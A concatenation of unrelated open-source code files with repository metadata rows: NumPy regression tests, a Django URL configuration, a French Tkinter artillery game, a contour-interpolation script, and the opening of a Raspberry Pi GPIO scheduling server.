# From e-mail thread "__eq__ with str and object" (Keith Goodman)
a1 = np.array(['a', 'b'], dtype=object)
a2 = np.array(['a', 'c'])
assert_array_equal(a1 == a2, [True, False])
assert_array_equal(a2 == a1, [True, False])
def test_nonzero_byteswap(self):
a = np.array([0x80000000, 0x00000080, 0], dtype=np.uint32)
a.dtype = np.float32
assert_equal(a.nonzero()[0], [1])
a = a.byteswap().newbyteorder()
assert_equal(a.nonzero()[0], [1]) # [0] if nonzero() ignores swap
def test_find_common_type_boolean(self):
# Ticket #1695
assert_(np.find_common_type([], ['?', '?']) == '?')
def test_empty_mul(self):
a = np.array([1.])
a[1:1] *= 2
assert_equal(a, [1.])
def test_array_side_effect(self):
assert_equal(np.dtype('S10').itemsize, 10)
A = np.array([['abc', 2], ['long ', '0123456789']], dtype=np.string_)
# This was throwing an exception because in ctors.c,
# discover_itemsize was calling PyObject_Length without checking
# the return code. This failed to get the length of the number 2,
# and the exception hung around until something checked
# PyErr_Occurred() and returned an error.
assert_equal(np.dtype('S10').itemsize, 10)
def test_any_float(self):
# all and any for floats
a = np.array([0.1, 0.9])
assert_(np.any(a))
assert_(np.all(a))
def test_large_float_sum(self):
a = np.arange(10000, dtype='f')
assert_equal(a.sum(dtype='d'), a.astype('d').sum())
def test_ufunc_casting_out(self):
a = np.array(1.0, dtype=np.float32)
b = np.array(1.0, dtype=np.float64)
c = np.array(1.0, dtype=np.float32)
np.add(a, b, out=c)
assert_equal(c, 2.0)
def test_array_scalar_contiguous(self):
# Array scalars are both C and Fortran contiguous
assert_(np.array(1.0).flags.c_contiguous)
assert_(np.array(1.0).flags.f_contiguous)
assert_(np.array(np.float32(1.0)).flags.c_contiguous)
assert_(np.array(np.float32(1.0)).flags.f_contiguous)
def test_squeeze_contiguous(self):
"""Similar to GitHub issue #387"""
a = np.zeros((1, 2)).squeeze()
b = np.zeros((2, 2, 2), order='F')[:,:, ::2].squeeze()
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.f_contiguous)
def test_reduce_contiguous(self):
"""GitHub issue #387"""
a = np.add.reduce(np.zeros((2, 1, 2)), (0, 1))
b = np.add.reduce(np.zeros((2, 1, 2)), 1)
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.c_contiguous)
def test_object_array_self_reference(self):
# Object arrays with references to themselves can cause problems
a = np.array(0, dtype=object)
a[()] = a
assert_raises(TypeError, int, a)
assert_raises(TypeError, long, a)
assert_raises(TypeError, float, a)
assert_raises(TypeError, oct, a)
assert_raises(TypeError, hex, a)
# Test the same for a circular reference.
b = np.array(a, dtype=object)
a[()] = b
assert_raises(TypeError, int, a)
# Numpy has no tp_traverse currently, so circular references
# cannot be detected. So resolve it:
a[()] = 0
# This was causing a to become like the above
a = np.array(0, dtype=object)
a[...] += 1
assert_equal(a, 1)
def test_object_array_self_copy(self):
# An object array being copied into itself DECREF'ed before INCREF'ing
# causing segmentation faults (gh-3787)
a = np.array(object(), dtype=object)
np.copyto(a, a)
assert_equal(sys.getrefcount(a[()]), 2)
a[()].__class__ # will segfault if object was deleted
def test_zerosize_accumulate(self):
"Ticket #1733"
x = np.array([[42, 0]], dtype=np.uint32)
assert_equal(np.add.accumulate(x[:-1, 0]), [])
def test_objectarray_setfield(self):
# Setfield directly manipulates the raw array data,
# so is invalid for object arrays.
x = np.array([1, 2, 3], dtype=object)
assert_raises(RuntimeError, x.setfield, 4, np.int32, 0)
def test_setting_rank0_string(self):
"Ticket #1736"
s1 = asbytes("hello1")
s2 = asbytes("hello2")
a = np.zeros((), dtype="S10")
a[()] = s1
assert_equal(a, np.array(s1))
a[()] = np.array(s2)
assert_equal(a, np.array(s2))
a = np.zeros((), dtype='f4')
a[()] = 3
assert_equal(a, np.array(3))
a[()] = np.array(4)
assert_equal(a, np.array(4))
def test_string_astype(self):
"Ticket #1748"
s1 = asbytes('black')
s2 = asbytes('white')
s3 = asbytes('other')
a = np.array([[s1], [s2], [s3]])
assert_equal(a.dtype, np.dtype('S5'))
b = a.astype(np.dtype('S0'))
assert_equal(b.dtype, np.dtype('S5'))
def test_ticket_1756(self):
"""Ticket #1756 """
s = asbytes('0123456789abcdef')
a = np.array([s]*5)
for i in range(1, 17):
a1 = np.array(a, "|S%d"%i)
a2 = np.array([s[:i]]*5)
assert_equal(a1, a2)
def test_fields_strides(self):
"Ticket #1760"
r=np.fromstring('abcdefghijklmnop'*4*3, dtype='i4,(2,3)u2')
assert_equal(r[0:3:2]['f1'], r['f1'][0:3:2])
assert_equal(r[0:3:2]['f1'][0], r[0:3:2][0]['f1'])
assert_equal(r[0:3:2]['f1'][0][()], r[0:3:2][0]['f1'][()])
assert_equal(r[0:3:2]['f1'][0].strides, r[0:3:2][0]['f1'].strides)
def test_alignment_update(self):
"""Check that alignment flag is updated on stride setting"""
a = np.arange(10)
assert_(a.flags.aligned)
a.strides = 3
assert_(not a.flags.aligned)
def test_ticket_1770(self):
"Should not segfault on python 3k"
import numpy as np
try:
a = np.zeros((1,), dtype=[('f1', 'f')])
a['f1'] = 1
a['f2'] = 1
except ValueError:
pass
except:
raise AssertionError
def test_ticket_1608(self):
"x.flat shouldn't modify data"
x = np.array([[1, 2], [3, 4]]).T
y = np.array(x.flat)
assert_equal(x, [[1, 3], [2, 4]])
def test_pickle_string_overwrite(self):
import re
data = np.array([1], dtype='b')
blob = pickle.dumps(data, protocol=1)
data = pickle.loads(blob)
# Check that loads does not clobber interned strings
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
data[0] = 0xbb
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
def test_pickle_bytes_overwrite(self):
if sys.version_info[0] >= 3:
data = np.array([1], dtype='b')
data = pickle.loads(pickle.dumps(data))
data[0] = 0xdd
bytestring = "\x01 ".encode('ascii')
assert_equal(bytestring[0:1], '\x01'.encode('ascii'))
def test_structured_type_to_object(self):
a_rec = np.array([(0, 1), (3, 2)], dtype='i4,i8')
a_obj = np.empty((2,), dtype=object)
a_obj[0] = (0, 1)
a_obj[1] = (3, 2)
# astype records -> object
assert_equal(a_rec.astype(object), a_obj)
# '=' records -> object
b = np.empty_like(a_obj)
b[...] = a_rec
assert_equal(b, a_obj)
# '=' object -> records
b = np.empty_like(a_rec)
b[...] = a_obj
assert_equal(b, a_rec)
def test_assign_obj_listoflists(self):
# Ticket # 1870
# The inner list should get assigned to the object elements
a = np.zeros(4, dtype=object)
b = a.copy()
a[0] = [1]
a[1] = [2]
a[2] = [3]
a[3] = [4]
b[...] = [[1], [2], [3], [4]]
assert_equal(a, b)
# The first dimension should get broadcast
a = np.zeros((2, 2), dtype=object)
a[...] = [[1, 2]]
assert_equal(a, [[1, 2], [1, 2]])
def test_memoryleak(self):
# Ticket #1917 - ensure that array data doesn't leak
for i in range(1000):
# 100MB times 1000 would give 100GB of memory usage if it leaks
a = np.empty((100000000,), dtype='i1')
del a
def test_ufunc_reduce_memoryleak(self):
a = np.arange(6)
acnt = sys.getrefcount(a)
res = np.add.reduce(a)
assert_equal(sys.getrefcount(a), acnt)
def test_search_sorted_invalid_arguments(self):
# Ticket #2021, should not segfault.
x = np.arange(0, 4, dtype='datetime64[D]')
assert_raises(TypeError, x.searchsorted, 1)
def test_string_truncation(self):
# Ticket #1990 - Data can be truncated in creation of an array from a
# mixed sequence of numeric values and strings
for val in [True, 1234, 123.4, complex(1, 234)]:
for tostr in [asunicode, asbytes]:
b = np.array([val, tostr('xx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xx'), val])
assert_equal(tostr(b[1]), tostr(val))
# test also with longer strings
b = np.array([val, tostr('xxxxxxxxxx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xxxxxxxxxx'), val])
assert_equal(tostr(b[1]), tostr(val))
def test_string_truncation_ucs2(self):
# Ticket #2081. Python compiled with two byte unicode
# can lead to truncation if itemsize is not properly
# adjusted for Numpy's four byte unicode.
if sys.version_info[0] >= 3:
a = np.array(['abcd'])
else:
a = np.array([sixu('abcd')])
assert_equal(a.dtype.itemsize, 16)
def test_unique_stable(self):
# Ticket #2063 must always choose stable sort for argsort to
# get consistent results
v = np.array(([0]*5 + [1]*6 + [2]*6)*4)
res = np.unique(v, return_index=True)
tgt = (np.array([0, 1, 2]), np.array([ 0, 5, 11]))
assert_equal(res, tgt)
def test_unicode_alloc_dealloc_match(self):
# Ticket #1578, the mismatch only showed up when running
# python-debug for python versions >= 2.7, and then as
# a core dump and error message.
a = np.array(['abc'], dtype=np.unicode)[0]
del a
def test_refcount_error_in_clip(self):
# Ticket #1588
a = np.zeros((2,), dtype='>i2').clip(min=0)
x = a + a
# This used to segfault:
y = str(x)
# Check the final string:
assert_(y == "[0 0]")
def test_searchsorted_wrong_dtype(self):
# Ticket #2189, it used to segfault, so we check that it raises the
# proper exception.
a = np.array([('a', 1)], dtype='S1, int')
assert_raises(TypeError, np.searchsorted, a, 1.2)
# Ticket #2066, similar problem:
dtype = np.format_parser(['i4', 'i4'], [], [])
a = np.recarray((2, ), dtype)
assert_raises(TypeError, np.searchsorted, a, 1)
def test_complex64_alignment(self):
# Issue gh-2668 (trac 2076), segfault on sparc due to misalignment
dtt = np.complex64
arr = np.arange(10, dtype=dtt)
# 2D array
arr2 = np.reshape(arr, (2, 5))
# Fortran write followed by (C or F) read caused bus error
data_str = arr2.tobytes('F')
data_back = np.ndarray(arr2.shape,
arr2.dtype,
buffer=data_str,
order='F')
assert_array_equal(arr2, data_back)
def test_structured_count_nonzero(self):
arr = np.array([0, 1]).astype('i4, (2)i4')[:1]
count = np.count_nonzero(arr)
assert_equal(count, 0)
def test_copymodule_preserves_f_contiguity(self):
a = np.empty((2, 2), order='F')
b = copy.copy(a)
c = copy.deepcopy(a)
assert_(b.flags.fortran)
assert_(b.flags.f_contiguous)
assert_(c.flags.fortran)
assert_(c.flags.f_contiguous)
def test_fortran_order_buffer(self):
import numpy as np
a = np.array([['Hello', 'Foob']], dtype='U5', order='F')
arr = np.ndarray(shape=[1, 2, 5], dtype='U1', buffer=a)
arr2 = np.array([[[sixu('H'), sixu('e'), sixu('l'), sixu('l'), sixu('o')],
[sixu('F'), sixu('o'), sixu('o'), sixu('b'), sixu('')]]])
assert_array_equal(arr, arr2)
def test_assign_from_sequence_error(self):
# Ticket #4024.
arr = np.array([1, 2, 3])
assert_raises(ValueError, arr.__setitem__, slice(None), [9, 9])
arr.__setitem__(slice(None), [9])
assert_equal(arr, [9, 9, 9])
def test_format_on_flex_array_element(self):
# Ticket #4369.
dt = np.dtype([('date', '<M8[D]'), ('val', '<f8')])
arr = np.array([('2000-01-01', 1)], dt)
formatted = '{0}'.format(arr[0])
assert_equal(formatted, str(arr[0]))
def test_deepcopy_on_0d_array(self):
# Ticket #3311.
arr = np.array(3)
arr_cp = copy.deepcopy(arr)
assert_equal(arr, arr_cp)
assert_equal(arr.shape, arr_cp.shape)
assert_equal(int(arr), int(arr_cp))
self.assertTrue(arr is not arr_cp)
self.assertTrue(isinstance(arr_cp, type(arr)))
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | -5,638,932,061,150,603,000 | 34.939055 | 92 | 0.525974 | false |
yabirgb/caucab | src/urls.py | 1 | 1654 | """src URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
import social.views
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth.views import login, logout
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', social.views.home, name = "home"),
url(r'^circle/(?P<circle_id>[\w-]+)$', view=social.views.circle),
url(r'^u/(?P<username>[\w-]+)$', view=social.views.profile),
url(r'^me/$', view=social.views.profile, name='profile'),
url(r'^publish/$', view=social.views.publish, name='publish'),
url(r'^notifications/$', view=social.views.notifications, name='notifications'),
url(r'^login/$', login,{"template_name" : "login.html",},name="login"),
# Map the 'django.contrib.auth.views.logout' view to the /logout/ URL.
# Pass additional parameters to the view like the page to show after logout
# via a dictionary used as the 3rd argument.
url(r'^logout/$', logout,{"next_page" : reverse_lazy('login')}, name="logout"),
]
| mit | -8,059,594,152,844,142,000 | 42.526316 | 84 | 0.679565 | false |
widowild/messcripts | exercice/python2/chap18/canon_cible_after.py | 1 | 7820 | # -*- coding:Latin-1 -*-
#####################################
# Bombardement d'une cible mobile #
# (C) G. Swinnen - Avril 2004 - GPL #
#####################################
from Tkinter import *
from math import sin, cos, pi
from random import randrange
from threading import Thread
class Canon:
"""Petit canon graphique"""
def __init__(self, boss, num, x, y, sens):
self.boss = boss # référence du canevas
self.num = num # n° du canon dans la liste
self.x1, self.y1 = x, y # axe de rotation du canon
self.sens = sens # sens de tir (-1:gauche, +1:droite)
self.lbu = 30 # longueur de la buse
# dessiner la buse du canon (horizontale) :
self.x2, self.y2 = x + self.lbu * sens, y
self.buse = boss.create_line(self.x1, self.y1,
self.x2, self.y2, width =10)
# dessiner le corps du canon (cercle de couleur) :
self.rc = 15 # rayon du cercle
self.corps = boss.create_oval(x -self.rc, y -self.rc, x +self.rc,
y +self.rc, fill ='black')
# pré-dessiner un obus (au départ c'est un simple point) :
self.obus = boss.create_oval(x, y, x, y, fill='red')
self.anim = 0
# retrouver la largeur et la hauteur du canevas :
self.xMax = int(boss.cget('width'))
self.yMax = int(boss.cget('height'))
def orienter(self, angle):
"régler la hausse du canon"
# rem : le paramètre <angle> est reçu en tant que chaîne.
# il faut donc le traduire en réel, puis le convertir en radians :
self.angle = float(angle)*2*pi/360
self.x2 = self.x1 + self.lbu * cos(self.angle) * self.sens
self.y2 = self.y1 - self.lbu * sin(self.angle)
self.boss.coords(self.buse, self.x1, self.y1, self.x2, self.y2)
def feu(self):
"déclencher le tir d'un obus"
# référence de l'objet cible :
self.cible = self.boss.master.cible
if self.anim ==0:
self.anim =1
# position de départ de l'obus (c'est la bouche du canon) :
self.xo, self.yo = self.x2, self.y2
v = 20 # vitesse initiale
# composantes verticale et horizontale de cette vitesse :
self.vy = -v *sin(self.angle)
self.vx = v *cos(self.angle) *self.sens
self.animer_obus()
def animer_obus(self):
"animer l'obus (trajectoire balistique)"
# positionner l'obus, en re-définissant ses coordonnées :
self.boss.coords(self.obus, self.xo -3, self.yo -3,
self.xo +3, self.yo +3)
if self.anim >0:
# calculer la position suivante :
self.xo += self.vx
self.yo += self.vy
self.vy += .5
self.test_obstacle() # a-t-on atteint un obstacle ?
self.boss.after(15, self.animer_obus)
else:
# fin de l'animation :
self.boss.coords(self.obus, self.x1, self.y1, self.x1, self.y1)
def test_obstacle(self):
"évaluer si l'obus a atteint une cible ou les limites du jeu"
if self.yo >self.yMax or self.xo <0 or self.xo >self.xMax:
self.anim =0
return
if self.yo > self.cible.y -3 and self.yo < self.cible.y +18 \
and self.xo > self.cible.x -3 and self.xo < self.cible.x +43:
# dessiner l'explosion de l'obus (cercle orange) :
self.explo = self.boss.create_oval(self.xo -10,
self.yo -10, self.xo +10, self.yo +10,
fill ='orange', width =0)
self.boss.after(150, self.fin_explosion)
self.anim =0
def fin_explosion(self):
"effacer le cercle d'explosion - gérer le score"
self.boss.delete(self.explo)
# signaler le succès à la fenêtre maîtresse :
self.boss.master.goal()
class Pupitre(Frame):
"""Pupitre de pointage associé à un canon"""
def __init__(self, boss, canon):
Frame.__init__(self, bd =3, relief =GROOVE)
self.score =0
s =Scale(self, from_ =88, to =65,
troughcolor ='dark grey',
command =canon.orienter)
s.set(45) # angle initial de tir
s.pack(side =LEFT)
Label(self, text ='Hausse').pack(side =TOP, anchor =W, pady =5)
Button(self, text ='Feu !', command =canon.feu).\
pack(side =BOTTOM, padx =5, pady =5)
Label(self, text ="points").pack()
self.points =Label(self, text=' 0 ', bg ='white')
self.points.pack()
# positionner à gauche ou à droite suivant le sens du canon :
gd =(LEFT, RIGHT)[canon.sens == -1]
self.pack(padx =3, pady =5, side =gd)
def attribuerPoint(self, p):
"incrémenter ou décrémenter le score"
self.score += p
self.points.config(text = ' %s ' % self.score)
class Cible:
"""objet graphique servant de cible"""
def __init__(self, can, x, y):
self.can = can # référence du canevas
self.x, self.y = x, y
self.cible = can.create_oval(x, y, x+40, y+15, fill ='purple')
def deplacer(self, dx, dy):
"effectuer avec la cible un déplacement dx,dy"
self.can.move(self.cible, dx, dy)
self.x += dx
self.y += dy
return self.x, self.y
class Thread_cible(Thread):
"""objet thread gérant l'animation de la cible"""
def __init__(self, app, cible):
Thread.__init__(self)
self.cible = cible # objet à déplacer
self.app = app # réf. de la fenêtre d'application
self.sx, self.sy = 6, 3 # incréments d'espace et de
self.dt =300 # temps pour l'animation (ms)
def run(self):
"animation, tant que la fenêtre d'application existe"
x, y = self.cible.deplacer(self.sx, self.sy)
if x > self.app.xm -50 or x < self.app.xm /5:
self.sx = -self.sx
if y < self.app.ym /2 or y > self.app.ym -20:
self.sy = -self.sy
if self.app != None:
self.app.after(int(self.dt), self.run)
def stop(self):
"fermer le thread si la fenêtre d'application est refermée"
self.app =None
def accelere(self):
"accélérer le mouvement"
self.dt /= 1.5
self.app.bell()
class Application(Frame):
def __init__(self):
Frame.__init__(self)
self.master.title('<<< Tir sur cible mobile >>>')
self.pack()
self.xm, self.ym = 600, 500
self.jeu = Canvas(self, width =self.xm, height =self.ym,
bg ='ivory', bd =3, relief =SUNKEN)
self.jeu.pack(padx =4, pady =4, side =TOP)
# Instanciation d'un canon et d'un pupitre de pointage :
x, y = 30, self.ym -20
self.gun =Canon(self.jeu, 1, x, y, 1)
self.pup =Pupitre(self, self.gun)
# instanciation de la cible mobile :
self.cible = Cible(self.jeu, self.xm/2, self.ym -25)
# animation de la cible mobile, sur son propre thread :
self.tc = Thread_cible(self, self.cible)
self.tc.start()
# arrêter tous les threads lorsque l'on ferme la fenêtre :
self.bind('<Destroy>',self.fermer_threads)
def goal(self):
"la cible a été touchée"
self.pup.attribuerPoint(1)
self.tc.accelere()
def fermer_threads(self, evt):
"arrêter le thread d'animation de la cible"
self.tc.stop()
if __name__ =='__main__':
Application().mainloop()
| gpl-3.0 | 7,332,927,941,599,991,000 | 39.102564 | 79 | 0.534015 | false |
rasmadeus/Equre | src/equre/equre.py | 1 | 5197 | # -*- coding: utf-8 -*-
__author__="rasmadeus"
__date__ ="$14.10.2014 20:00:10$"
class EqurePoint:
def __init__(self, x, y, value):
self._x = x
self._y = y
self._value = value
def x(self):
return self._x
def y(self):
return self._y
def value(self):
return self._value
def interpolate(self, point, value):
"""
>>> point1 = EqurePoint(0.0, 10.0, 10.0)
>>> point1.interpolate(EqurePoint(10.0, 0.0, 0.0), 5.0)
(5.0, 5.0)
>>> point1.interpolate(EqurePoint(10.0, 0.0, 10.0), 10.0)
(5.0, 5.0)
"""
import math
length = point._value - self._value
k_of_value = 0.5 if (length == 0) else (value - self._value) / length
x_of_value = self._x + k_of_value * (point._x - self._x)
y_of_value = self._y + k_of_value * (point._y - self._y)
return (x_of_value, y_of_value)
@staticmethod
def make_from(line_of_file):
"""
>>> line = '45 34 12'
>>> point = EqurePoint.make_from(line)
>>> point.value()
12.0
>>> line = '23'
>>> point = EqurePoint.make_from(line)
>>> point.value()
0.0
>>> point.x()
23.0
"""
def get_value(values, i):
try:
return float(values[i])
except:
return 0.0
values = line_of_file.split()
if len(values) == 0:
raise Exception('line of file is empty')
return EqurePoint(get_value(values, 0), get_value(values, 1), get_value(values, 2))
class EqureCurve:
def __init__(self):
self.clear()
def clear(self):
self._points = []
def values(self):
return [point.value() for point in self._points]
def count(self):
return len(self._points)
def point(self, i):
return self._points[i]
def append(self, x, y, value):
"""
>>> curve = EqureCurve()
>>> curve.append(1, 2, 0)
>>> curve.append(2, 4, -1)
>>> curve.append(4, 1, 4)
>>> print(curve.values())
[-1, 0, 4]
"""
self._append(EqurePoint(x, y, value))
self._sort()
def _sort(self):
self._points.sort(key=lambda point: point.value())
def _append(self, equre_curve):
self._points.append(equre_curve)
def fill_from(self, path_to_file):
"""
>>> path_to_test_file = './/test_data//equre_points.txt'
>>> curve = EqureCurve()
>>> curve.fill_from(path_to_test_file)
>>> curve.values()
[-23.2, -23.0, 0.0, 0.0, 2.0, 34.0]
"""
for line_of_file in open(path_to_file, 'r'):
try:
point = EqurePoint.make_from(line_of_file)
self._append(point)
except:
pass
self._sort()
def make_equal_curve_for(self, value):
"""
>>> equre_curve = EqureCurve()
>>> equre_curve.append(0.0, 10.0, 10.0)
>>> equre_curve.append(10.0, 0.0, 0.0)
>>> equre_curve.make_equal_curve_for(5.0)
[(5.0, 5.0)]
>>> equre_curve.append(5.0, 1.0, 5.0)
>>> equre_curve.append(15.0, 7.0, 6.0)
>>> equre_curve.make_equal_curve_for(5.0)
[(5.0, 1.0), (5.0, 1.0), (5.0, 1.0), (5.0, 1.0), (5.0, 5.0), (14.166666666666668, 5.833333333333334)]
"""
curve = []
for i in range(self.count()):
if self.point(i).value() <= value:
for j in range(i, self.count(), 1):
if self.point(j).value() >= value:
curve.append(self.point(i).interpolate(self.point(j), value))
curve.sort(key=lambda xy: xy[1])
return curve
def make_equals_curves_for(self, begin_value, step):
"""
>>> equre_curve = EqureCurve()
>>> equre_curve.append(0.0, 10.0, 10.0)
>>> equre_curve.append(10.0, 0.0, 0.0)
>>> equre_curve.make_equals_curves_for(0.0, 5.0)
{0.0: [(10.0, 0.0), (10.0, 0.0)], 10.0: [(0.0, 10.0), (0.0, 10.0)], 5.0: [(5.0, 5.0)]}
"""
curves = {}
current_value = begin_value
last_value = self.point(self.count() - 1).value()
while current_value <= last_value:
curve = self.make_equal_curve_for(current_value)
if len(curve) != 0:
curves[current_value] = curve
current_value += step
return curves
def make_out_files(self, begin_value, step, out_files_dir):
curves = self.make_equals_curves_for(begin_value, step)
for value, curve in curves.iteritems():
from os import path
out_file = open(path.join(out_files_dir, '{value}.txt'.format(value=value)), 'w')
out_file.write(u'X,km\tH,km\n')
for xh in curve:
out_file.write('{x}\t{h}\n'.format(x=xh[0], h=xh[1]))
| gpl-2.0 | 3,393,329,533,278,369,300 | 30.125749 | 109 | 0.469694 | false |
ihmeuw/vivarium | setup.py | 1 | 2877 | from pathlib import Path
from setuptools import setup, find_packages
if __name__ == "__main__":
base_dir = Path(__file__).parent
src_dir = base_dir / 'src'
about = {}
with (src_dir / "vivarium" / "__about__.py").open() as f:
exec(f.read(), about)
with (base_dir / "README.rst").open() as f:
long_description = f.read()
install_requirements = [
'numpy',
'pandas',
'pyyaml>=5.1',
'scipy',
'click',
'tables',
'networkx',
'loguru',
]
interactive_requirements = [
'IPython',
'ipywidgets',
'jupyter',
]
test_requirements = [
'pytest',
'pytest-mock',
]
doc_requirements = [
'sphinx>=4.0',
'sphinx-rtd-theme',
'sphinx-click',
'IPython',
'matplotlib'
]
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__summary__'],
long_description=long_description,
license=about['__license__'],
url=about["__uri__"],
author=about["__author__"],
author_email=about["__email__"],
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)",
"Natural Language :: English",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Operating System :: POSIX :: BSD",
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Education",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Artificial Life",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Medical Science Apps.",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Software Development :: Libraries",
],
package_dir={'': 'src'},
packages=find_packages(where='src'),
include_package_data=True,
install_requires=install_requirements,
tests_require=test_requirements,
extras_require={
'docs': doc_requirements,
'test': test_requirements,
'interactive': interactive_requirements,
'dev': doc_requirements + test_requirements + interactive_requirements,
},
entry_points="""
[console_scripts]
simulate=vivarium.interface.cli:simulate
""",
zip_safe=False,
)
| gpl-3.0 | -3,836,647,185,870,237,000 | 27.485149 | 89 | 0.524157 | false |
arek125/remote-GPIO-control-server | rgc-server1_1.py | 1 | 40098 | import socket
import sys
import hashlib
from datetime import datetime
import os
import signal
import glob
import sqlite3
import threading
import time
import RPi.GPIO as GPIO
HOST = ''
PORT = 8888
PASSWORD = ''
ENC_KEY = ''
exitapp = False
break_ = -1
db_path = 'rgc-server.db3'
CODE_VERSION = 2
def stringToint(string):
try:
ints = int(string)
except ValueError:
print "Error while converting String to Int"
return ints
def planowanie():
if exitapp == False:
rtime = 1
threading.Timer(rtime, planowanie).start()
conndb2 = sqlite3.connect(db_path, check_same_thread=False)
conndb2.isolation_level = None
cursor2 = conndb2.execute("SELECT * from planowanie p join stany s on p.Out_id = s.Id")
for row in cursor2:
if row[1] == 'date':
if row[4] == datetime.utcnow().strftime('%Y-%m-%d %H:%M'):
if row[10] != row[6]:
set=row[6]
if row[6] == 2:
set=int(not row[10])
GPIOset(row[9],set)
gpiolist = row[9].split(",")
for gpio in gpiolist:
conndb2.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=? and IN_OUT like 'out') or (GPIO_BCM like ? and Id!=? and IN_OUT like 'out');",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",row[5],"%,"+gpio+"%",row[5]))
conndb2.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? and IN_OUT like 'out' ;",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,row[5]))
conndb2.execute("UPDATE stany set Stan =?, Edit_time=? where Id=?",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[5]))
conndb2.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("scheduled",row[5],"ON" if ((set and not row[14]) or (not set and row[14])) else "OFF"))
conndb2.execute("DELETE from planowanie where Id=?", (row[0],))
conndb2.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb2.commit()
elif row[1] == 'hour':
if row[4] == datetime.utcnow().strftime('%H:%M'):
if row[10] != row[6]:
set=row[6]
if row[6] == 2:
set=int(not row[10])
GPIOset(row[9],set)
gpiolist = row[9].split(",")
for gpio in gpiolist:
conndb2.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=? and IN_OUT like 'out') or (GPIO_BCM like ? and Id!=? and IN_OUT like 'out');",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",row[5],"%,"+gpio+"%",row[5]))
conndb2.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? and IN_OUT like 'out' ;",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,row[5]))
conndb2.execute("UPDATE stany set Stan =?, Edit_time=? where Id=?",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[5]))
conndb2.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("scheduled",row[5],"ON" if ((set and not row[14]) or (not set and row[14])) else "OFF"))
if row[3] == 'once':
conndb2.execute("DELETE from planowanie where Id=?", (row[0],))
conndb2.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb2.commit()
elif row[1] == 'timer':
timelist = row[4].split(",")
time = int(timelist[1]) - rtime
if time <= 0:
if row[10] != row[6]:
set=row[6]
if row[6] == 2:
set=int(not row[10])
GPIOset(row[9],set)
gpiolist = row[9].split(",")
for gpio in gpiolist:
conndb2.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=? and IN_OUT like 'out') or (GPIO_BCM like ? and Id!=? and IN_OUT like 'out');",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",row[5],"%,"+gpio+"%",row[5]))
conndb2.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? and IN_OUT like 'out' ;",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,row[5]))
conndb2.execute("UPDATE stany set Stan =?, Edit_time=? where Id=?",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[5]))
conndb2.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("scheduled",row[5],"ON" if ((set and not row[14]) or (not set and row[14])) else "OFF"))
if row[3] == 'once':
conndb2.execute("DELETE from planowanie where Id=?", (row[0],))
conndb2.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
else:
conndb2.execute("UPDATE planowanie set Dane=?, Edit_time=? where Id=?",(timelist[0]+','+timelist[0],datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[0]))
else:
conndb2.execute("UPDATE planowanie set Dane=?, Edit_time=? where Id=?",(str(timelist[0])+','+str(time),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[0]))
conndb2.commit()
conndb2.close()
